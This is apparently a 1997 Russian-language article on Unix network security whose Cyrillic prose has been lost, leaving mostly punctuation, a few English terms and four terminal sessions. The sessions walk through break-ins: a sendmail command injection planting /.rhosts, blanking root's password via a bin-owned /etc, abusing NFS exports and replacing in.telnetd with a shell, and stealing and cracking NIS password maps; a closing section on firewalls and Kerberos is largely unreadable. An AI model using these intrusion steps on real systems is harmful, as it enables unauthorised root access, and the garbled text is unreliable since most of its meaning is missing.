. ,
" ", lsu@kiae.su
---------------------------------------------------------------
TCP/IP Internet. , . , , . Internet . , , . CERT.
, , Internet, . "", . , Unix, .
. IP sendmail, . , Unix-. , . passwd , rlogin, rsh shell ( 1).
1 |
crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! 25 - SMTP
220 sendmail SMI/4.3.5.2 ready
! , , .
helo xxx
220 Helo xxx, ( crack.edu )
mail from: "|echo crack.edu>/.rhosts"@target.remote.com
! .
200 Sender ok.
rcpt to: nosuchuser
!
500 nosuchuser: user unknown
! , .
data
230 Enter mail, end with "."
200 Mail accepted
! , ....
quit
crack% su
! , who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
|
Unix . , : Sun, SunOS 4, NIS , , ( 2).
2 |
crack# su - bin
$ rsh target.remote.com /bin/csh -i
! /etc/hosts.equiv "+" ...
Welcome to remote.com!
! /etc bin...
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc
! passwd ...
% mv passwd passwd.was
% cp passwd.was passwd
!
% ed passwd
2341
1p
root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh&5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
! .
% echo /bin/csh -i | su root
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd
! , .
|
TCP/IP , Network File System (NFS).
/etc/exports (SunOS 4.1) ( 3).
3 |
crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha
! NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt
!
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.edu > user/.rhosts
! .rhosts
# cat >> /etc/passwd
user::257:20::/:
^D
!
# su - user
!
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
!
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
!
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
! , ! root"
% cd /usr/etc
% mv in.telnetd in.telnetd1
!
% cat > in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd
!
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;
! /etc
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc
! 1.
.......
|
NIS- , "" passwd, . , , crack . ( 4) ( , ).
4 |
! NIS
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind
! ...
crack% ypx -o target.passwd -g target.remote.com
!
crack% crack target.passwd
!
[ a lot of time ]
OK, user "user" has password "iamuser"
! ,
crack% telnet target.remote.com
! .
.....
|
, , . , . (cisco, wellfleet...) Unix- (Sun, DEC, BSDI, FreeBSD). . , / . rlogin, rsh, RPC (. ), , 2048 2049, - NFS. , , 25 . , - , TCP- . ( . firewall - ). " " (software firewall). , IP-, . , , (telnet, ftp...), , , . . , , ftp arch.kiae.su, :
% ftp arch.kiae.su
Connected to arch.kiae.su
Name: (arch.kiae.su: you)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our.workstation.our.company.com
.....
:
% ftp our-soft-firewall
Name: (our-soft-firewall:user) ftp@arch.kiae.su
Password: XXXXXXX
Connected to arch.kiae.su
Name: (arch.kiae.su: ftp)
230 Guest login ok, send ident as password
Password: you@your.site
230 - Hello, user@our-soft-firewall.our.company.com
.......
telnet, rlogin, X11 ..
"" . , "" . ? , - , , Ethernet. , , . , , , NFS. , , , . , .
80- Kerberos. . , "" , . , , . . , , , - . , , . , , , , , . . . , . . -, . , , , telnet , , , . , Kerberos 4 . , Kerberos, , , . Kerberos 4 , , Kerberos ( , ..). , , 5, . Sphinx DEC NIS+ Sun. , (RPC UDP) .
, , , . "" . - , . He " ", - "" , .
Last-modified: Mon, 05 May 1997 07:36:09 GMT